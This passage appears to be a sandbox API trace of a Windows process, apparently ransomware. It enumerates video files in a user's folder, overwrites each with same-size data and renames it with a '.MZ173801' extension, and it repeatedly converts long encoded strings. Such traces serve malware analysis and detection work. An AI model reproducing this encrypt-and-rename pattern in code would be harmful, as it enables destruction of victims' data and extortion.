EY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0119.622] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0119.622] GetCurrentThreadId () returned 0x1358 [0119.623] GetCurrentThreadId () returned 0x1358 [0119.623] GetCurrentThreadId () returned 0x1358 [0119.623] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0119.623] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0119.623] GetCurrentThreadId () returned 0x1358 [0119.623] GetCurrentThreadId () returned 0x1358 [0119.623] GetCurrentThreadId () returned 0x1358 [0119.623] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\NVV_UxLtcOyTWBX\\5iO4NXS5B547.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\di1gf8ysdacjrr-s\\nvv_uxltcoytwbx\\5io4nxs5b547.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x408 [0119.623] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f40c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f40c*=0) returned 0x0 [0119.624] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f404*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f404*=0) returned 0x0 [0119.624] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f404*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f404*=0) returned 0x3373 [0119.624] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f404*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f404*=0) returned 0x0 [0119.624] ReadFile (in: hFile=0x408, lpBuffer=0x2432c60, nNumberOfBytesToRead=0x3373, lpNumberOfBytesRead=0x19f418, lpOverlapped=0x0 | out: lpBuffer=0x2432c60*, lpNumberOfBytesRead=0x19f418*=0x3373, lpOverlapped=0x0) returned 1 [0119.625] CloseHandle (hObject=0x408) returned 1 [0119.625] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\NVV_UxLtcOyTWBX\\5iO4NXS5B547.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\di1gf8ysdacjrr-s\\nvv_uxltcoytwbx\\5io4nxs5b547.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x408 [0119.626] WriteFile (in: hFile=0x408, lpBuffer=0x2436c90*, nNumberOfBytesToWrite=0x3373, lpNumberOfBytesWritten=0x19f424, lpOverlapped=0x0 | out: lpBuffer=0x2436c90*, lpNumberOfBytesWritten=0x19f424*=0x3373, lpOverlapped=0x0) returned 1 [0119.627] CloseHandle (hObject=0x408) returned 1 [0119.628] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\NVV_UxLtcOyTWBX\\5iO4NXS5B547.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\di1gf8ysdacjrr-s\\nvv_uxltcoytwbx\\5io4nxs5b547.mp4"), lpNewFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\NVV_UxLtcOyTWBX\\5iO4NXS5B547.mp4.MZ173801" (normalized: "c:\\users\\fd1hvy\\videos\\di1gf8ysdacjrr-s\\nvv_uxltcoytwbx\\5io4nxs5b547.mp4.mz173801")) returned 1 [0119.629] GetCurrentThreadId () returned 0x1358 [0119.629] GetCurrentThreadId () returned 0x1358 [0119.629] GetCurrentThreadId () returned 0x1358 [0119.629] GetCurrentThreadId () returned 0x1358 [0119.629] GetCurrentThreadId () returned 0x1358 [0119.629] GetCurrentThreadId () returned 0x1358 [0119.629] FindNextFileW (in: hFindFile=0xa1baf0, lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8727af40, ftCreationTime.dwHighDateTime=0x1d5efbd, ftLastAccessTime.dwLowDateTime=0xf3039d40, ftLastAccessTime.dwHighDateTime=0x1d5e537, ftLastWriteTime.dwLowDateTime=0xf3039d40, ftLastWriteTime.dwHighDateTime=0x1d5e537, nFileSizeHigh=0x0, nFileSizeLow=0x16d19, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName="AGPyvogzOcyci-XJyAn.mkv", cAlternateFileName="AGPYVO~1.MKV")) returned 1 [0119.629] FileTimeToLocalFileTime (in: lpFileTime=0x19f564, lpLocalFileTime=0x19f4c4 | out: lpLocalFileTime=0x19f4c4) returned 1 [0119.629] FileTimeToDosDateTime (in: lpFileTime=0x19f4c4, lpFatDate=0x19f532, lpFatTime=0x19f530 | out: lpFatDate=0x19f532, lpFatTime=0x19f530) returned 1 [0119.629] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\NVV_UxLtcOyTWBX\\AGPyvogzOcyci-XJyAn.mkv" (normalized: "c:\\users\\fd1hvy\\videos\\di1gf8ysdacjrr-s\\nvv_uxltcoytwbx\\agpyvogzocyci-xjyan.mkv"), fInfoLevelId=0x0, lpFileInformation=0x19f458 | out: lpFileInformation=0x19f458*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8727af40, ftCreationTime.dwHighDateTime=0x1d5efbd, ftLastAccessTime.dwLowDateTime=0xf3039d40, ftLastAccessTime.dwHighDateTime=0x1d5e537, ftLastWriteTime.dwLowDateTime=0xf3039d40, ftLastWriteTime.dwHighDateTime=0x1d5e537, nFileSizeHigh=0x0, nFileSizeLow=0x16d19)) returned 1 [0119.630] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0119.630] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0119.630] GetCurrentThreadId () returned 0x1358 [0119.630] GetCurrentThreadId () returned 0x1358 [0119.630] GetCurrentThreadId () returned 0x1358 [0119.630] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0119.630] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0119.631] GetCurrentThreadId () returned 0x1358 [0119.631] GetCurrentThreadId () returned 0x1358 [0119.631] GetCurrentThreadId () returned 0x1358 [0119.631] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\NVV_UxLtcOyTWBX\\AGPyvogzOcyci-XJyAn.mkv" (normalized: "c:\\users\\fd1hvy\\videos\\di1gf8ysdacjrr-s\\nvv_uxltcoytwbx\\agpyvogzocyci-xjyan.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x408 [0119.631] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f40c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f40c*=0) returned 0x0 [0119.631] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f404*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f404*=0) returned 0x0 [0119.631] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f404*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f404*=0) returned 0x16d19 [0119.631] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f404*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f404*=0) returned 0x0 [0119.631] ReadFile (in: hFile=0x408, lpBuffer=0x23a47a0, nNumberOfBytesToRead=0x16d19, lpNumberOfBytesRead=0x19f418, lpOverlapped=0x0 | out: lpBuffer=0x23a47a0*, lpNumberOfBytesRead=0x19f418*=0x16d19, lpOverlapped=0x0) returned 1 [0119.633] CloseHandle (hObject=0x408) returned 1 [0119.634] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\NVV_UxLtcOyTWBX\\AGPyvogzOcyci-XJyAn.mkv" (normalized: "c:\\users\\fd1hvy\\videos\\di1gf8ysdacjrr-s\\nvv_uxltcoytwbx\\agpyvogzocyci-xjyan.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x408 [0119.636] WriteFile (in: hFile=0x408, lpBuffer=0x23bc7d0*, nNumberOfBytesToWrite=0x16d19, lpNumberOfBytesWritten=0x19f424, lpOverlapped=0x0 | out: lpBuffer=0x23bc7d0*, lpNumberOfBytesWritten=0x19f424*=0x16d19, lpOverlapped=0x0) returned 1 [0119.638] CloseHandle (hObject=0x408) returned 1 [0119.642] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\NVV_UxLtcOyTWBX\\AGPyvogzOcyci-XJyAn.mkv" (normalized: "c:\\users\\fd1hvy\\videos\\di1gf8ysdacjrr-s\\nvv_uxltcoytwbx\\agpyvogzocyci-xjyan.mkv"), lpNewFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\NVV_UxLtcOyTWBX\\AGPyvogzOcyci-XJyAn.mkv.MZ173801" (normalized: "c:\\users\\fd1hvy\\videos\\di1gf8ysdacjrr-s\\nvv_uxltcoytwbx\\agpyvogzocyci-xjyan.mkv.mz173801")) returned 1 [0119.643] GetCurrentThreadId () returned 0x1358 [0119.643] GetCurrentThreadId () returned 0x1358 [0119.643] GetCurrentThreadId () returned 0x1358 [0119.643] GetCurrentThreadId () returned 0x1358 [0119.643] GetCurrentThreadId () returned 0x1358 [0119.643] GetCurrentThreadId () returned 0x1358 [0119.643] FindNextFileW (in: hFindFile=0xa1baf0, 